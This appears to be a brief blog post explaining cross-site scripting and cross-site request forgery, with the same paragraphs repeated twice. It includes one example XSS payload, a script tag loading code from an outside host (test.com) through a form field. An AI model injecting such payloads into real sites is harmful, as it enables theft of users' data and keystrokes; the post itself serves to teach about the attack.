Cross-Site Scripting (XSS)
XSS is a code injection attack.The attacker tries to display a code which they control, in the target site. If target site allows HTML characters in a form field, where form field can be entered like "Something<script type="text/javascript" src="http://www.test.com/script.js"></script>" Here, when this field details are displayed in a page, the script too will run. Someone can use this script to grab sensitive information, log the key strokes, etc...
Cross-Site Request Forgery (CSRF)
This is also known as one-click attack or session riding. This is a form of attack where an authenticated user performs an action on a site without knowing it.
XSS is a code injection attack.The attacker tries to display a code which they control, in the target site. If target site allows HTML characters in a form field, where form field can be entered like "Something<script type="text/javascript" src="http://www.test.com/script.js"></script>" Here, when this field details are displayed in a page, the script too will run. Someone can use this script to grab sensitive information, log the key strokes, etc...
Cross-Site Request Forgery (CSRF)
This is also known as one-click attack or session riding. This is a form of attack where an authenticated user performs an action on a site without knowing it.
No comments:
Post a Comment